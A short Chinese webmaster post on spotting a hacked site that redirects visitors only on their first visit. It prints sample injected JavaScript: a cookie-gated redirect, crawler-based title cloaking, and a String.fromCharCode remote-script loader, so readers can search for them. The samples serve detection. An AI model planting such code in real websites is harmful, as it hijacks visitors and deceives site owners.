假如你的网站被黑了,第一次打开网页时显示跳转到其他网站。再打开时却正常。
不要以为网站没事。请注意查一下类似于以下的代码。
var c = document.cookie; if (c.indexOf('isfirstvisited=false') != -1) { } else { var d = new Date(); d.setFullYear(d.getFullYear() + 1); document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString(); location = 'https://baidu.com' }
这是以JS为例子,如果被植入的木马在PHP中,大致雷同。
请务必进行全站搜索相关关键词
isfirstvisited
等
同时看一下后台数据库中有没有被修改或者模板文件中被修改类似这样的。
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf('baidu') == -1)
另一种:
<script> if (!navigator.userAgent.match(/baiduspider|sogou|360spider|yisou/i)) { document.title = "正常的标题"; } </script>
根据访问者是否为特定爬虫来决定是否动态设置页面标题。这就是为了迷惑网站管理人员的,当你直接打开网页的时候,显示正常的标题,当你通过搜索引擎打开就显示他附加的另外的代码设置的标题,然后进行跳转,通常伴有内似下面的代码。
<noscript><title>字符#什么的</title> <meta name="keywords" content="字符#什么的"/> <meta name="description" content="字符#什么的"/></noscript> <script type="text/javascript">;var bc = String.fromCharCode(104,106,115等一串数字实际上是生成一个动态JS); var script = document.createElement('script'); script.src = bc; document.head.appendChild(script);</script>
PBOOTCMS在运行时间久了之后,有可能会造成服务器卡顿。通过慢日志发现,是file.php中的path_delete() 函数...
webp能将原图压缩30%左右还能保持清楚。所以正在被越来越多的人喜欢。pb要增这个功能,第一步:找到ueditor...
在外贸网站建设中,我们会遇到有客户说需要用户前端留言的时候可以上传自定义的文件或者图片等资料。那么这...
如果新建了一个网站为中文版,安装到根目录下。然后复制了中文版的数据和内容,安装到子目录下作为英文站点...